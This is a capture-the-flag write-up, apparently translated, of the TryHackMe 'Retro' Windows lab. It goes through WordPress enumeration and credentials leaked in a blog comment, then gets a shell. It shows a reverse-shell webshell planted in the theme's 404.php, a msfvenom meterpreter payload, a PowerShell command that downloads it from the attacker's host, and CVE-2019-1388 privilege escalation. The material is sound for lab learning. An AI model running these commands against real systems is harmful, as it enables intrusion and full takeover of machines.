[Tryhackme] Retro (UAC authorization: privilege promotion of Windows Certificate dialog box)

Disclaimers

The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.

Service discovery

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/tryhackme]
โ””โ”€# nmap -sV -Pn 10.10.10.216    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 05:03 EDT
Nmap scan report for 10.10.10.216
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.16 seconds

There is only one 80 service and database

Blasting catalogue

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/dirsearch]
โ””โ”€# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.216/_21-11-05_05-03-57.txt

Error Log: /root/dirsearch/logs/errors-21-11-05_05-03-57.log

Target: http://10.10.10.216/

[05:03:57] Starting: 
[05:04:35] 301 -  150B  - /retro  ->  http://10.10.10.216/retro/  

Scan a directory and browse it. It's a wordpress website
At this time, the enumeration is divided into two steps: one is to continue to explode the directory, and the other is to enumerate wp information by wpsscan

wp directory explosion

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/dirsearch]
โ””โ”€# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216/retro

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.10.216/-retro_21-11-05_05-08-12.txt

Error Log: /root/dirsearch/logs/errors-21-11-05_05-08-12.log

Target: http://10.10.10.216/retro/

[05:08:14] Starting: 
[05:08:21] 301 -  161B  - /retro/wp-content  ->  http://10.10.10.216/retro/wp-content/
[05:08:24] 301 -  162B  - /retro/wp-includes  ->  http://10.10.10.216/retro/wp-includes/
[05:09:04] 301 -  159B  - /retro/wp-admin  ->  http://10.10.10.216/retro/wp-admin/

There are three folders, and there is no file traversal vulnerability. It seems that there is no information to take advantage of

wp information enumeration

Confirm wp version: 5.2.1

โ””โ”€# wpscan --url http://10.10.10.216/retro    

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ยฎ
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.216/retro/ [10.10.10.216]
[+] Started: Fri Nov  5 05:09:28 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.216/retro/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.10.216/retro/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.216/retro/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.216/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.10.216/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>

[+] WordPress theme in use: 90s-retro
 | Location: http://10.10.10.216/retro/wp-content/themes/90s-retro/
 | Latest Version: 1.4.10 (up to date)
 | Last Updated: 2019-04-15T00:00:00.000Z
 | Readme: http://10.10.10.216/retro/wp-content/themes/90s-retro/readme.txt
 | Style URL: http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
 | Style Name: 90s Retro
 | Style URI: https://organicthemes.com/retro-theme/
 | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
 | Author: Organic Themes
 | Author URI: https://organicthemes.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4.10 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Nov  5 05:10:05 2021
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 44.025 KB
[+] Data Received: 221.001 KB
[+] Memory used: 210.141 MB
[+] Elapsed time: 00:00:36

kali searches for vulnerabilities in this version wp

Show that sql injection exists

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~]
โ””โ”€# searchsploit WordPress 5.2.1       
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts                                                                                                                                   | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                                                                                                                                                   | php/dos/47800.py
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities                                                                                                                                       | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                                                                                                                                                 | php/webapps/44943.txt
WordPress Plugin Link Library 5.2.1 - SQL Injection                                                                                                                                                       | php/webapps/17887.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                                                                                                                                               | php/webapps/48918.sh
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

It shows that a plug-in has an injection vulnerability, but the plug-in does not exist in the wp tested, and wpscan does not sweep out the plug-in

On the home page, the author's name is wade. Use this account to try to log in to wp prompt

ERROR: The password you entered for the username wade is incorrect.

This means that the wade account does exist

We also prove the existence of Wade and wade by enumerating user names with wpscan

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:01:07 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:01:07

[i] User(s) Identified:

[+] wade
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.216/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Wade
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

The prompt of user.txt is:

Don't leave sensitive information out in the open, even if you think you have control over it.

We assume that the author talks about information related to his password in public, perhaps hidden in a blog post

A mid-term article seems to reveal some information

Ready Player One

by Wade

I can't believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it's because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I'll eventually get it down. Either way, I'm really excited to see this movie! 

Ready Player One is the number one player,

At least now we know that writers often confuse their names with the characters. The name of the protagonist of the film is wade

Under the comment of this post, the author disclosed his password parzival:

Wade
December 9, 2019

Leaving myself a note here just in case I forget how to spell it: parzival

Initial shell

Because the system has opened 3389 service, use wade:parzival remote desktop to get user.txt from the target

xfreerdp /u:wade /v:10.10.10.216

At the same time, we can log in to wordpress with the above credentials
The penetration routine of wordpress is to edit the source code in appearance - > Theme Editor once you get the login account of the administrator

I usually write webshell to 404.php, and then visit a nonexistent page in the foreground to trigger the rebound shell

We put windows version reverse_shell Write 404.php and get webshell

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/tryhackme]
โ””โ”€# nc -nlvp 4242                
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.10.216] 49792
SOCKET: Shell has connected! PID: 3436
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\retro>whoami
iis apppool\retro

We use msfvenom to generate a stable shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 -f exe > shell_64.exe

Upload to the target with webshell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.13.21.169:8000/shel...','C:\users\public\Downloads\shell_64.exe')"

Download nc and wget to the target for subsequent penetration. After testing, C:\users\public\Downloads is writable:

On the remote desktop, click shell with wade's account_ 64.exe, received wade's rebound shell

msf6 exploit(windows/local/bypassuac_sdclt) > use exploit/multi/handler 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.13.21.169:4444 
[*] Sending stage (200262 bytes) to 10.10.10.216
[*] Meterpreter session 3 opened (10.13.21.169:4444 -> 10.10.10.216:50582) at 2021-11-22 05:48:04 -0500

meterpreter > getuid
Server username: RETROWEB\Wade

Right raising

Tips on raising rights are:

Figure out what the user last was trying to find. Otherwise, put this one on ice and get yourself a better shell, perhaps one dipped in venom.

At first, I thought I was looking for historical commands in cmd or powershell, but I didn't get any results. Later, it was found that in the history of the browser, the author left a hint to find CVE-2019-1388

I found it on github this Right raising script.

The explanation on github is relatively simple. I'll follow it later This article The article detailing the principle of this vulnerability is raised to the system

Generally speaking, the principle of raising rights is the paragraph in the article:

When OID is a hyperlink, clicking this link will trigger consent.exe to open the browser with SYSTEM permission to access this link, and then the browser will have SYSTEM permission. By saving the browsing page, Microsoft's Explorer will pop up. Open cmd.exe program by mail in Explorer, and the SYSTEM permission of the browser will be inherited. Therefore, the promotion from ordinary users to NT AUTHORITY\SYSTEM users is completed!

Get root.txt on the Administrator desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 7443-948C

 Directory of C:\Users\Administrator\Desktop

12/08/2019  08:06 PM    <DIR>          .
12/08/2019  08:06 PM    <DIR>          ..
12/08/2019  08:08 PM                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,362,959,872 bytes free

Keywords: penetration test CTF

Added by $var on Mon, 22 Nov 2021 21:59:34 +0200